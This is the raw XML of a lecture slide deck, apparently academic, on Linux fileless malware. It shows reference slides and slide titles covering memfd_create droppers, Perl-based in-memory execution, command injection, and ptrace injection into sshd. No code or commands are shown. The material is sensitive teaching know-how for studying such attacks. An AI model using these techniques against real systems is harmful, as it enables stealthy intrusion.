            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Malware with Command Line Forensics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>sandflysecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Loading "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" Shared Objects (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>dlopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Juan Manuel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Fernández</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>解析 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>共享記憶體</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>機制 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>jserv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>how does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> malware work on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>dr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>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D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39372430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Warning: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> attacks are on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>rise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Igor G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>New </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Research: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Malware Attacks Surge by 900% and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Cryptominers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Make a Comeback, While Ransomware Attacks Decline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>WatchGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>一種無檔案後門</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>技巧 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>M0rk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>環境下無文件執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>spook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a: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31805014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How do I read from /proc/$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/mem under Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Stackexchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> introduction AKA injecting into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>fun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Adam Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>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98</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0846961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What Is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Malware and How Do Attacks Occur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Aaron Walker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="投影片編號版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>For Windows</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="651278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6218</TotalTime>
  <Words>4451</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>523</Paragraphs>
  <Slides>104</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>佈景主題</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>投影片標題</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>104</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="105" baseType="lpstr">
      <vt:lpstr>波形</vt:lpstr>
      <vt:lpstr>Linux Fileless Malware </vt:lpstr>
      <vt:lpstr>Differences of DLL injection between Windows and Linux  [Michael Genkin]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Command Injection [Weilin Zhong]</vt:lpstr>
      <vt:lpstr>Command Injection vs Code Injection [Weilin Zhong]</vt:lpstr>
      <vt:lpstr>Code Example 1 [Weilin Zhong]</vt:lpstr>
      <vt:lpstr>Attack Scenario [Weilin Zhong]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>memfd_create [man7.org]</vt:lpstr>
      <vt:lpstr>Files Created by memfd_create() [man7.org]</vt:lpstr>
      <vt:lpstr>Argument name [man7.org]</vt:lpstr>
      <vt:lpstr>Anonymous File (/proc/&lt;PID&gt;/fd) Example [Stuart]</vt:lpstr>
      <vt:lpstr>memfd_create [David Herrmann]</vt:lpstr>
      <vt:lpstr>Property 1 [David Herrmann]</vt:lpstr>
      <vt:lpstr>Property 2 [David Herrmann]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Dropper Code (evil) Excerpt [M0rk]</vt:lpstr>
      <vt:lpstr>Execution [M0rk]</vt:lpstr>
      <vt:lpstr>Execution Scenario [M0rk] </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Pre-installed Software That Can Be Used to Execute Code [FBK CyberSecurity] </vt:lpstr>
      <vt:lpstr>memfd_create() [FBK CyberSecurity] </vt:lpstr>
      <vt:lpstr>Where the File Created by memfd_create Are Stored [FBK CyberSecurity] </vt:lpstr>
      <vt:lpstr>A Scenario of Fileless Malware Execution</vt:lpstr>
      <vt:lpstr>Execution through Interpreters</vt:lpstr>
      <vt:lpstr>Execution Flow</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Names of Attack Perl Scripts</vt:lpstr>
      <vt:lpstr>Operation Steps[itw01.com] </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Invoke memfd_create in Perl [Stuart] </vt:lpstr>
      <vt:lpstr>From an Already-open File Descriptor to a File Handle [Stuart]</vt:lpstr>
      <vt:lpstr>Code [itw01.com]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Transfer a binary into Perl print statements [Stuart]</vt:lpstr>
      <vt:lpstr>Explanation[Stuart]</vt:lpstr>
      <vt:lpstr>Diamond Operator (1) [Gabor Szabo]</vt:lpstr>
      <vt:lpstr>Diamond Operator (2) [Gabor Szabo]</vt:lpstr>
      <vt:lpstr>Execution [itw01.com]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Code [itw01.com]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Ptrace Protocol [高魁良]</vt:lpstr>
      <vt:lpstr>Some Actions Specified by Argument request [Adam Chester]</vt:lpstr>
      <vt:lpstr>ptrace [Linux manual page]</vt:lpstr>
      <vt:lpstr>Tracee vs. Thread [Linux manual page]</vt:lpstr>
      <vt:lpstr>ptrace call [Linux manual page]</vt:lpstr>
      <vt:lpstr>Initialize a Trace [Linux manual page]</vt:lpstr>
      <vt:lpstr>When a Tracee will Stop [Linux manual page]</vt:lpstr>
      <vt:lpstr>When a Tracer will be Notified        [Linux manual page]</vt:lpstr>
      <vt:lpstr>Inspect and Mofidy a Tracee           [Linux manual page]</vt:lpstr>
      <vt:lpstr>Stop Tracing [Linux manual page]</vt:lpstr>
      <vt:lpstr>waitpid() — Wait for a Specific Child Process to End [IBM]</vt:lpstr>
      <vt:lpstr>Process Completion Status [GNU]</vt:lpstr>
      <vt:lpstr>How to Read and Write Other Process Memory [Chris Wellons]</vt:lpstr>
      <vt:lpstr>File View of a Process’ Entire Address Space [Chris Wellons]</vt:lpstr>
      <vt:lpstr>Attach a Process That You Want to Read or Write [Chris Wellons]</vt:lpstr>
      <vt:lpstr>File /proc/PID/maps [Adam Chester]</vt:lpstr>
      <vt:lpstr>Example of File /proc/PID/maps [Adam Chester]</vt:lpstr>
      <vt:lpstr>Search /proc/PID/maps [Adam Chester]</vt:lpstr>
      <vt:lpstr>Write/Read [Chris Wellons]</vt:lpstr>
      <vt:lpstr> process_vm_readv()</vt:lpstr>
      <vt:lpstr>process_vm_writev()</vt:lpstr>
      <vt:lpstr>GDB Allow Writes to Non-writable Addresses [Mark Plotnick]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> Scenario (1) [Ben Nick]</vt:lpstr>
      <vt:lpstr> Scenario (2) [Ben Nick]</vt:lpstr>
      <vt:lpstr> Scenario (3) [Ben Nick]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>mmap [man7.org] </vt:lpstr>
      <vt:lpstr>How to use mmap function in C language? [Bamdeb Ghosh]</vt:lpstr>
      <vt:lpstr>The mmap() System Call             [Alan L. Cox et al.]</vt:lpstr>
      <vt:lpstr>Usage [man7.org]</vt:lpstr>
      <vt:lpstr>Argument addr [man7.org]</vt:lpstr>
      <vt:lpstr>File Mapping [man7.org]</vt:lpstr>
      <vt:lpstr>prot Argument [man7.org]</vt:lpstr>
      <vt:lpstr>flags Argument [man7.org]</vt:lpstr>
      <vt:lpstr>Return Value [man7.org]</vt:lpstr>
      <vt:lpstr>What Is “Living off the Land?”        [Yiftach Keshet] </vt:lpstr>
      <vt:lpstr>Linux Malware Authors Use Ezuri Golang crypter for Zero Detection  [Ax Sharma]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Subdirectory of /proc [itread01.com] </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Storage of an File Created by memfd_create[man7.org]</vt:lpstr>
      <vt:lpstr>Anonymous Memory                 [kernel development community]</vt:lpstr>
      <vt:lpstr>Property 1 [David Herrmann]</vt:lpstr>
      <vt:lpstr>truncate, ftruncate [die.net]</vt:lpstr>
      <vt:lpstr>Description [die.net]</vt:lpstr>
      <vt:lpstr>Caution [die.net]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>For Windows</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>  [FBK CyberSecurity] </vt:lpstr>
      <vt:lpstr> [FBK CyberSecurity] </vt:lpstr>
      <vt:lpstr> [FBK CyberSecurity] </vt:lpstr>
      <vt:lpstr>  [FBK CyberSecurity]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Fileless Malware </dc:title>
  <dc:creator>hsufh</dc:creator>
  <cp:lastModifiedBy>Fu-Hau H</cp:lastModifiedBy>
  <cp:revision>166</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-29T01:41:56Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-16T02:58:21Z</dcterms:modified>
</cp:coreProperties>
</file>